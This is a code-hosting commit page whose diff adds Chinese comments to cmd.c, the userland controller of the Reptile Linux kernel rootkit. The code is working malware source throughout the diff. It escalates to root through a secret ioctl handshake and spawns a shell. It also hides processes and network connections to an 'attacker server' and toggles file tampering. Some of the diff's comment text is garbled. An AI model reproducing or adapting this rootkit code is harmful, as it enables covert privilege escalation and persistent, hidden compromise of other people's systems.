py5ktlmgf
/
reptile
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update cmd.c

Browse Source
Scripts解析
pti2ume7z 7 months ago
parent 0b5f28d2b0
commit 10e0d3a49b
1 changed files with 178 additions and 167 deletions
Show Stats Download Patch File Download Diff File

345
src/Reptile/userland/cmd.c
Unescape View File

@ -10,178 +10,189 @@
#include <sys/types.h>
#include <unistd.h>
// 定义默认的shell路径
#define SHELL "/bin/bash"
/**
* @brief
*/
struct control {
unsigned short cmd;
void *argv;
unsigned short cmd; // 命令类型
void *argv; // 命令参数
};
/**
* @brief
* @param argc
* @param argv
* @return int
*/
int main(int argc, char **argv)
{
int sockfd;
struct control args;
struct sockaddr_in addr;
struct hostent *host;
unsigned int pid;
char *bash = SHELL;
char *envp[1] = {NULL};
char *arg[3] = {SHELL, NULL};
if (argc < 2)
exit(0);
sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0)
goto fail;
if (strcmp(argv[1], "root") == 0) {
if (geteuid() == 0) {
printf("You are already root! :)\n\n");
close(sockfd);
goto out;
}
args.cmd = 3;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA);
}
if (geteuid() == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n");
execve(bash, arg, envp);
} else {
printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
}
goto out;
}
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
if (argc < 2)
goto fail;
if (argc == 2) {
args.cmd = 0;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
} else {
args.cmd = 1;
pid = (unsigned int)atoi(argv[2]);
args.argv = &pid;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
}
if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
if (strcmp(argv[1], "conn") == 0) {
if (argc < 4)
goto fail;
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 4;
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5;
} else {
goto fail;
}
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
int sockfd; // 套接字文件描述符
struct control args; // 控制结构体实例
struct sockaddr_in addr; // 地址结构体实例
struct hostent *host; // 主机信息结构体指针
unsigned int pid; // 进程ID
char *bash = SHELL; // shell路径
char *envp[1] = {NULL}; // 环境变量数组
char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
// 如果参数少于2个退出程序
if (argc < 2)
exit(0);
// 创建TCP套接字
sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0)
goto fail; // 如果创建失败跳转到fail标签
// 如果第一个参数是"root"
if (strcmp(argv[1], "root") == 0) {
// 如果已经是root用户提示并关闭套接字后退出
if (geteuid() == 0) {
printf("You are already root! :)\n\n");
close(sockfd);
goto out;
}
args.cmd = 3; // 设置命令为3
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA);
}
// 如果成功获取root权限执行shell否则提示无权限
if (geteuid() == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n");
execve(bash, arg, envp);
} else {
printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
}
goto out; // 跳转到out标签
}
// 如果第一个参数是"hide"或"show"
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
// 如果参数少于2个跳转到fail标签
if (argc < 2)
goto fail;
// 如果只有一个参数,隐藏或显示所有连接
if (argc == 2) {
args.cmd = 0; // 设置命令为0
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
} else { // 如果有两个参数隐藏或显示指定PID的连接
args.cmd = 1; // 设置命令为1
pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
args.argv = &pid; // 设置命令参数为PID
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
}
// 如果第一个参数是"file-tampering"
if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2; // 设置命令为2
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
// 如果第一个参数是"conn"
if (strcmp(argv[1], "conn") == 0) {
// 如果参数少于4个跳转到fail标签
if (argc < 4)
goto fail;
// 根据第四个参数设置命令为4hide或5show
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 4; // 设置命令为4
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5; // 设置命令为5
} else {
goto fail; // 如果第四个参数不是"hide"或"show"跳转到fail标签
}
// 获取主机信息
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail; // 如果获取主机信息失败跳转到fail标签
// 复制主机地址到地址结构体中
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET; // 设置地址族为IPv4
addr.sin_port = htons(atoi(argv[3])); // 设置端口号
args.argv = &addr; // 设置命令参数为地址结构体指针
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out; // 成功后跳转到out标签
}
}
}
}
/*
// This part is deprecated. There is no reason to hide specific protocols
// when you want to hide some connection, in the most of cases you will
// need to hide every connection and everything about your attacker server.
if (strcmp(argv[1], "udp") == 0) {
if (argc < 4)
goto fail;
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 6;
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 7;
} else {
goto fail;
}
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}
*/
fail:
printf("\e[01;31mFailed!\e[00m\n");
out:
close(sockfd);
return 0;
}
UDPTCP使
if (strcmp(argv[1], "udp") == 0) {
if (argc < 4)
goto fail;
if (strcmp(argv[4], "hide") == 0) {
args.cmd = 6;
} else if (strcmp(argv[4], "show") == 0) {
args.cmd = 7;
} else {
goto fail;
}
host = gethostbyname(argv[2]);
if (host == NULL)
goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n");
goto out;
}
}
}
}*/
fail: // fail标签打印失败信息并关闭套接字
printf("\e[01;31mFailed!\e[00m\n");
out: // out标签关闭套接字并返回0表示程序结束
close(sockfd); // 关闭套接字文件描述符
return 0; // 返回0表示程序正常结束
}
Write Preview
Loading…
Cancel
Save